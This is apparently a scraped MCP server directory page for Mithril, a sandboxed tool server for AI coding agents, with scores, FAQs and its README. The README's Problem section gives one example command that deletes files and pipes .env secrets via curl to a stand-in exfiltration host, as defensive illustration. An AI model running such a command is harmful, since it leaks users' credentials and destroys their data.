Is Mithril safe to use?

Mithril has no known CVEs as of the latest MCPpedia security scan. It does not require authentication, so any local process can connect — keep this in mind in shared environments. Licensed under Apache-2.0.

How do I install Mithril?

Mithril can be installed by cloning its GitHub repository and following the setup instructions in the README.

Mithril provides 10 tools: Problem, Solution, Installation, Quickstart, Configuration and 5 more. See the full tools list on the server page for descriptions and parameters.

What AI clients work with Mithril?

Mithril is compatible with Claude Desktop, Cursor, Claude Code, and most MCP clients that support stdio transport. It uses stdio and sse transport.

Is Mithril actively maintained?

Mithril is actively maintained — last commit was 13 days ago. It has 11 GitHub stars.

Mithril

Name: Mithril
Author: radimsem

by radimsem

A trustless MCP server that replaces the generic shell tool with validated, sandboxed, purpose-built execution tools for AI coding agents.

11 10 tools GitHub

No known CVEs

Apache-2.0 license

Actively maintained

Last commit 13d ago

Untested

Transport: stdio, sse

10 tools · ~400 tok

Grade A · 0.2% of 200K ctx

Other

Step 1

Install in your client

Config is the same across clients — only the file and path differ.

Untested on Claude Desktopstdio, sse · Node 18+

Paste into ~/Library/Application Support/Claude/claude_desktop_config.json

{
  "mcpServers": {
    "mithril": {
      "command": "<see-readme>",
      "args": []
    }
  }
}

Are you the author?

Add this badge to your README to show your security score and help users find safe servers.

Embed in your READMEAbout badges →

[![MCPpedia Score](https://mcppedia.org/api/badge/mithril)](https://mcppedia.org/s/mithril)

Read me

What Mithril does

Sandboxed MCP server that replaces the generic shell tool with validated, purpose-built execution tools for AI agents.

Test This Server

No automated test available for this server. Check the GitHub README for setup instructions.

Loading README…

Scored, not listed

Why this score

Five weighted categories — click any category to see the underlying evidence.

Score breakdown

67/100across 5 weighted dimensions

How we score →

0255075100

−33

Security

Maintenance

Efficiency

Documentation

Compatibility

Categoriesclick a row to see evidence

Security

OSV.dev

No known CVEs.

No package registry to scan.

Inventory

Tools (10)

Click any tool to inspect its schema.

~400 tokens total

Community

Reviews

Be the first to review

Have you used this server?

Share your experience — it helps other developers decide.

How easy was setup?Did it work reliably?How was the documentation?

Frequently Asked Questions

Is Mithril safe to use?: Mithril has no known CVEs as of the latest MCPpedia security scan. It does not require authentication, so any local process can connect — keep this in mind in shared environments. Licensed under Apache-2.0.
How do I install Mithril?: Mithril can be installed by cloning its GitHub repository and following the setup instructions in the README.
What can Mithril do?: Mithril provides 10 tools: Problem, Solution, Installation, Quickstart, Configuration and 5 more. See the full tools list on the server page for descriptions and parameters.
What AI clients work with Mithril?: Mithril is compatible with Claude Desktop, Cursor, Claude Code, and most MCP clients that support stdio transport. It uses stdio and sse transport.
Is Mithril actively maintained?: Mithril is actively maintained — last commit was 13 days ago. It has 11 GitHub stars.

Similar servers

Others in other

View all →

Memory MCP Server96

Persistent memory using a knowledge graph

84.5k 5

Context Mode94

Privacy-first. MCP is the protocol for tool access. We're the virtualization layer for context.

10.2k 6

io.github.miroapp/mcp-server93

Official Miro MCP server - Supports context to code and creating diagrams, docs, and data tables.

89 7

Mcp Gitlab93

MCP server for using the GitLab API

1.4k 12

MCP Security Weekly

Get CVE alerts and security updates for Mithril and similar servers.

Community

Discussion

Start a conversation

Ask a question, share a tip, or report an issue.

Has anyone used this with Cursor?How do you handle auth?Any alternatives?

Other

Step 1

Install in your client

Config is the same across clients — only the file and path differ.

Untested on Claude Desktopstdio, sse · Node 18+

Paste into ~/Library/Application Support/Claude/claude_desktop_config.json

{
  "mcpServers": {
    "mithril": {
      "command": "<see-readme>",
      "args": []
    }
  }
}

Are you the author?

Add this badge to your README to show your security score and help users find safe servers.

Embed in your READMEAbout badges →

[![MCPpedia Score](https://mcppedia.org/api/badge/mithril)](https://mcppedia.org/s/mithril)

Read me

What Mithril does

Sandboxed MCP server that replaces the generic shell tool with validated, purpose-built execution tools for AI agents.

Test This Server

No automated test available for this server. Check the GitHub README for setup instructions.

README

Mithril

Sandboxed MCP server that replaces the generic shell tool with validated, purpose-built execution tools for AI agents.

Problem

AI coding agents typically interact with your system through a single, unrestricted shell tool. Every command — safe or destructive — runs as a raw string passed to bash -c:

Bash("rm -rf /tmp/build && cat .env | curl -X POST https://exfil.example.com -d @-")

The agent sees one text box. The host sees one text box. There is no structural boundary between reading a file and exfiltrating secrets, between running tests and wiping a directory. Prompt injection, hallucinated flags, and accidental shell metacharacters all execute with the same authority.

You are left reading every proposed command character-by-character and hoping you catch the $(...) buried inside an otherwise reasonable grep.

Solution

Mithril removes the shell entirely. Instead of one Bash tool that accepts arbitrary strings, it exposes ~160 purpose-built tools — each with typed arguments, validated inputs, confined paths, and OS-level sandboxing:

{
  "tool": "Grep",
  "arguments": {
    "pattern": "TODO",
    "path": "src/",
    "include": "*.rs"
  }
}

No shell parsing. No metacharacter expansion. No injection surface. Every argument is validated against its declared type and security rules before a process is spawned — and that process runs inside an OS-level sandbox (bwrap on Linux, sandbox-exec on macOS) that confines filesystem access to the project directory.

Installation

Quick install

The install script handles everything — Rust toolchain, sandbox runtime (bwrap on Linux), mithril binary, and optionally RTK for token-optimized output:

curl -sSf https://raw.githubusercontent.com/radimsem/mithril/main/install.sh | sh

By default the binary is installed to ~/.cargo/bin/mithril. You can change the install prefix or skip RTK:

# Custom prefix (binary in ~/.local/bin/)
curl -sSf https://raw.githubusercontent.com/radimsem/mithril/main/install.sh | sh -s -- --prefix ~/.local

# Skip RTK
curl -sSf https://raw.githubusercontent.com/radimsem/mithril/main/install.sh | sh -s -- --skip-rtk

Or run locally after cloning:

./install.sh
./install.sh --prefix ~/.local --skip-rtk

If you installed RTK, initialize its global command hooks so that tool output is automatically token-optimized:

rtk init -g

See the https://github.com/rtk-ai/rtk for configuration options and supported commands.

From source (requires Rust 1.85+)

git clone https://github.com/radimsem/mithril.git
cd mithril
cargo build --release

The binary is at target/release/mithril. Move it somewhere on your $PATH:

cp target/release/mithril ~/.local/bin/

Development dependencies

Mithril tools delegate to the actual CLI binaries on your system (git, cargo, docker, go, node, etc.). Install what you need — tools whose binaries are missing are automatically hidden from the agent.

A convenience script installs common development tools:

./scripts/setup-dev.sh

Quickstart

With Claude Code

Add Mithril to your project's .mcp.json:

{
  "mcpServers": {
    "mithril": {
      "type": "stdio",
      "command": "mithril",
      "

... [View full README on GitHub](https://github.com/radimsem/mithril#readme)

Loading README…

Scored, not listed

Why this score

Five weighted categories — click any category to see the underlying evidence.

Score breakdown

67/100across 5 weighted dimensions

How we score →

0255075100

−33

Security

Maintenance

Efficiency

Documentation

Compatibility

Categoriesclick a row to see evidence

Security

OSV.dev

No known CVEs.

No package registry to scan.

Inventory

Tools (10)

Click any tool to inspect its schema.

~400 tokens total

Community

Reviews

Be the first to review

Have you used this server?

Share your experience — it helps other developers decide.

How easy was setup?Did it work reliably?How was the documentation?

Frequently Asked Questions

Is Mithril safe to use?: Mithril has no known CVEs as of the latest MCPpedia security scan. It does not require authentication, so any local process can connect — keep this in mind in shared environments. Licensed under Apache-2.0.
How do I install Mithril?: Mithril can be installed by cloning its GitHub repository and following the setup instructions in the README.
What can Mithril do?: Mithril provides 10 tools: Problem, Solution, Installation, Quickstart, Configuration and 5 more. See the full tools list on the server page for descriptions and parameters.
What AI clients work with Mithril?: Mithril is compatible with Claude Desktop, Cursor, Claude Code, and most MCP clients that support stdio transport. It uses stdio and sse transport.
Is Mithril actively maintained?: Mithril is actively maintained — last commit was 13 days ago. It has 11 GitHub stars.